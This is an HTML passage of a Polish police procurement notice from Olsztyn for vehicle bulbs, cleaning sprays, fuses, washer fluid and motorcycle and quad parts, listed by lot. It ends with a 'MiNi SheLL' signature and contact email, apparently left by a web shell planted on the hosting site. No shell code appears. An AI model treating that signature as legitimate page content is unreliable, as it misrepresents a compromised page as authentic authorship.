2)  W przypadku wystąpienia innych okoliczności niezależnych od woli stron, których nie można było przewidzieć, a w wyniku których spełnienie świadczenia w terminach określonych w umowie okazało się niemożliwe. W przypadku wystąpienia okoliczności, o których mowa wyżej, dopuszcza się zmianę terminu realizacji zamówienia o czas niezbędny na usuniecie przeszkody w jego realizacji.
3)  Nastąpiła zmiana podwykonawcy oraz zakresu realizacji zamówienia przez podwykonawcę.     
4) Zmiany spowodowane wzrostem albo zmniejszeniem stawki VAT. Jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów towarów po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia Wykonawcy o kwotę równą różnicy w kwocie podatku VAT zapłaconego przez Wykonawcę. Jeśli zmiana stawki VAT będzie powodować zmniejszenie kosztów towarów po stronie Wykonawcy, Zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę kwoty podatku VAT zapłaconego przez Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.warminsko-mazurska.policja.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Wojewódzka Policji w Olsztynie Sekcja Zamówień Publicznych i Funduszy Pomocowych ul. Partyzantów6/8,10-521 Olsztyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2016 godzina 13:00, miejsce: Komenda Wojewódzka Policji w Olsztynie Sekcja Zamówień Publicznych i Funduszy Pomocowych ul. Partyzantów6/8,10-521 Olsztyn.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Akcesoria samochodowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> żarówka h 7  55 w  12 v	2000	szt,
żarówka h 1  55w 12 v	300	szt,
żarówka h 3  55 w 12 v	300	szt,
żarówka h 4  55 / 60 w 12 v 	300	szt,
żarówka h 8  35 w 12 v	60	szt,
żarówka hb 3  60 w 12 v	50	szt,
żarnik xenonowy  d1s     35 w	30	szt,
żarnik xenonowy  d2s     35 w	30	szt,
żarówka z cokołem ba9s   4 w 12 v	100	szt,
żarówka kulka z cokołem  5 w 12 v ba15s	800	szt,
żarówka kulka z cokołem 10 w 12 v ba15s	800	szt,
żarówka z cokoł kierunk 21 w 12 v ba15s	500	szt,
żarówka z cokoł kierunk pomarańczowa       21 w 12 v ba15s	100	szt,
żarówka 2-włók z cokoł 21 / 5 w 12 v bay15d	800	szt,
żarówka rurka śr 36 mm 5 w 12 v c5w sv8,5	300	szt,
żarówka rurka śr 36 mm 10 w 12 v c5w sv8,5	100	szt,
żarówka całoszklana z płetw 5 w 12 v w5w	800	szt,
żarówka całoszklana z płetw 5 w 12 v w5w pomarańczowa	200	szt,
żarówka całoszkl z płetw 16 w 12 v w16w	100	szt,
żarówka całoszkl z płetw 3 w 12 v 	200	szt,
żarówka niskonapięciowa kanałowa  60 w 24 v e27	150	szt,
plak do konsoli zapachowy nabłyszczający spray opak min 750 ml	140	szt,
plak do zderzaków nabłyszczający  spray opak min 600 ml	50	szt,
plak do czyszczenia tapicerki  spray opak min 600 ml	50	szt,
mleczko do polerowania nadwozia opak min 600 ml	40	szt,
odmrażacz do zamków opak min 50 ml	200	szt,
odmrażacz do szyb spray opak min 300 ml	60	szt,
preparat wd 40   opak min 450 ml spray	80	szt,
preparat spray miedż opak min 400 ml	50	szt,
preparat odtłuszczacz- zmywacz  spray  opak min 600 ml	70	szt,
środek do czyszczenia silnika spray opak min 600 ml	40	szt,
preparat kontakt - spray do elementów elektrycznych opak min 400 ml	40 szt,
elektrolit opak 5 litrów	10	szt,
skrobaczka do szyb krótka plastik szerokość pow roboczej min 9 cm 100szt,
skrobaczka do szyb krótka z blaszką szerokość pow roboczej min 6 cm	200 szt,
skrobaczka do szyb długa z blaszką dług min 500 cm szer pow roboczej min 6 cm	100	szt,
skrobaczko zmiotka do śniegu i lodu szer pow roboczej skrobaczki min 6 cm , szer pow roboczej zmiotki min 12 cm grubość min 2 cm 80 szt,
szczotka - zmiotka z szufelką 50	szt,
szczotka do mycia samochodów szer pow roboczej min 15 cm grubość min 3 cm	50	szt,
zacisk przewodu metal skręcany o   8 - 12 mm	300	szt,
zacisk przewodu metal skręcany o  10 -16 mm 	300	szt,
zacisk przewodu metal skręcany o  12 - 20 mm	300	szt,
zacisk przewodu metal skręcany o  16 - 25 mm	300	szt,
zacisk przewodu metal skręcany o  20 - 32 mm	300	szt,
zacisk przewodu metal skręcany o  25 - 40 mm	300	szt,
zacisk przewodu metal skręcany o  30 - 45 mm	300	szt,
zacisk przewodu metal skręcany o  40 - 60 mm	300	szt,
zacisk przewodu metal skręcany o  60 - 80 mm	300	szt,
zacisk przewodu metal skręcany o  70 - 90 mm	300	szt,
zacisk przewodu metal skręcany o  80 -100 mm	200	szt,
taśma zaciskowa jednorazowa plastik długość 160 mm x 2,5	400	szt,
taśma zaciskowa jednorazowa plastik długość 300 mm x 3,6	400	szt,
taśma zaciskowa jednorazowa plastik długość 300 mm x 7,8	400	szt,
taśma zaciskowa jednorazowa plastik  długość 350 mm x4,8	400	szt,
koszulki termokurczliwe długość 1 mb            o 3 - 8 mm	300	szt,
taśma izolacyjna pcv rolka długość min 20 mb szer min 15 mm	30	szt,
bezpiecznik płytkowy standard   5 a 	500	szt,
bezpiecznik płytkowy standard 10 a 	500	szt,
bezpiecznik płytkowy standard  15 a 	500	szt,
bezpiecznik płytkowy standard  20 a 	400	szt,
bezpiecznik płytkowy standard  25 a 	400	szt,
bezpiecznik płytkowy standard  30 a 	400	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.30.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin dostawy - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Płyny do spryskiwaczy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zapachowy płyn do spryskiwaczy samochodowych letni w pojemnikach 4 lub 5 - litrowych	3 000 litrów,
Zapachowy płyn do spryskiwaczy samochodowych zimowy do - 22 stopni c w pojemnikach 4 lub 5 - litrowych	13 000 litrów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.30.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin dostawy - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Części do motocykla Triumph.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filtr powietrza	T2204820	10 szt,
Filtr oleju	T1210443	13 szt,
Klocki h-ca przód  kpl na 1 tarczę	T2020329	26 kpl,
Klocki h-ca tył kpl na 1 tarczę T2020072 13	kpl,
Tarcza h-ca przód T2027110 8 szt,
Tarcza h-ca tył	T2025375	5 szt,
Komplet napędowy wzmocniony -łańcuch z zębatkami -	T2017200	4 kpl,
Uszczelnienie amortyzatora przód  kpl na 1 amortyzator T2046232 Oil Seal  T2046250   Dust Seal	14 kpl,
Świeca zapłonowa  3-szt na motor T1290181  NGK CR8EK	24	szt,
Smar do łańcuchów oringowych - szosa MOTUL CHAIN LUBE ROAD PLUS C2 (lub równoważny) - opak. min 400 ml	13 szt,
Sprzęgło z koszem  kpl T1172200 1 kpl,
Zestaw sprzęgła  kpl tarczek sprzęgłowych ciernych + kpl sprężynek sprzęgła + kpl przekładek metalowych MCC129-9  +  MEF129-5  + T1171049	3 kpl,
Łożysko koła przód 2 sztuki - kpl na motor T3800704 10 szt,
Łożysko koła tył 2 sztuki - kpl na motor T3800703 8 szt,
Łożysko zębatki tylniej 1 szt na motor	T3800215	6 szt,
Olej do silnika 4-litry na motor	MOTUL 7100  10W40 syntetyk (lub równoważny) opak 4 litry 13 szt,
Olej do amortyzatorów przód 1,2 l na motor  2 amortyzatory MOTUL FORKOIL  EX10W   półsyntetyk (lub równoważny) opak 1 litr 13 szt,
Akumulator YTX12-BS	13 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.41.10.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin dostawy - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Części do motocykla Honda.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filtr powietrza 17210MFAD00 10	szt,
Filtr oleju 15410MCJ505 16	szt,
Klocki h-ca przód kpl na 1 tarczę	06455MFAD12	30	kpl,
Klocki h-ca tył kpl na 1 tarczę	06435MFAD12	15	kpl,
Tarcza h-ca przód lewa	45220MFAD11	15	szt,
Tarcza h-ca przód prawa	45120MFAD11	15	szt,
Tarcza h-ca tył	43251MFAD11	15	szt,
Komplet napędowy wzmocniony - łańcuch z zębatkami -	06406MFAD00	4	kpl,
Uszczelnienie amortyzatora przód kpl na 1 amortyzator   olejowe + p-pyłowe 	51490MEED01	20	kpl,
Świeca zapłonowa 4 szt na motor	9805958916	40	szt,
Smar do łańcucha- szosa	MOTUL CHAIN LUBE ROAD PLUS C2 (lub równoważny) - opak. min 400 ml 	16	szt,
Zestaw sprzęgła  kpl tarczek sprzęgłowych ciernych + kpl przekładek metalowych kpl na motor	22201MBB000   szt 2                 22201MEL000   szt 6         22321MEL000  szt 6            22322MEL000  SZT 1 -	3	kpl,
Łożysko koła przód 2 sztuki - kpl na motor	91052MBWE11	10	kpl,
Łożysko koła tył 2 sztuki - kpl na motor	91052MAE004	10	kpl,
Łożysko zębatki tył 1 sztuka na motor	91051MAS003	6	szt,
Olej do silnika 4-litry  na motor	MOTUL 7100 10w40     syntetyk (lub równoważny) opak 4-litry	16	szt,
Olej do amortyzatorów przód 1,2 l na motor 2 amortyzatory 	MOTUL FORKOIL  EX10W   półsyntetyk(lub równoważny)  opak 1 litr	16	szt,
Akumulator	YTZ10S-BS   lub CTZ10S-BS	16	szt,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.41.10.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin dostawy - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Części do quada Polaris.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filtr oleju	2540086	9	szt,
Filtr powietrza	5811633	9	szt,
Klocki h-ca przód kpl na 1 tarczę	2204088	18	kpl,
Klocki h-ca tył kpl na 1 tarczę	2202412	9	kpl,
Tarcza h-ca przód	5244314	12	szt,
Tarcza h-ca tył	5248250	7	szt,
Pasek napędowy	3211113	6	szt,
Świeca zapłonowa	3021671	18	szt,
Linka gazu	7081220	6	szt,
Końcówka drążka kierowniczego	51-1021	8	szt,
Krzyżak półosi napędowej	19-5005	20	szt,
Akumulator żelowy	YIX30L  30 Ah 12 V	9	szt,
Olej do silnika 2,5 litra na Quada	MOTUL 5100  10W40    opak 1 litr	27	szt,
Olej skrzyni biegów 0,5 litra  na Quada	MOTUL  GEAR 300    75W90 opak 1 litr	6	szt,
Olej przedni most  0,2 litra na Quada	MOTUL GEARBOX 300 80W90  opak 1 litr	6	szt,
Olej tylni most 0,3 litra na Quada	MOTUL GEARBOX 300 80W90  opak 1 litr	6	szt,
Opona przód 25 x 8.00 - 12	6-przekładek , bieżnik jodełka - kostka	12	szt,
Opona tył 25 x 10.00 - 12	6-przekładek , bieżnik jodełka - kostka	12	szt,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.22.42.00-5, 34.35.11.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin dostawy - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com